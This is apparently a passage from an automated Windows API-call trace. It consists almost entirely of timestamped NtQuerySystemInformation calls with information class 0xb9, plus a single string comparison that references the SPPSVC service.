NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x28, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0271.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde40, Length=0x20, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0271.871] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0271.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x28, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x28, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x28, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x20, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x20, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x20, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5a0, Length=0x50, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x28, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd370, Length=0x28, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0271.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x28, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x38, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x20, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x20, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0271.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 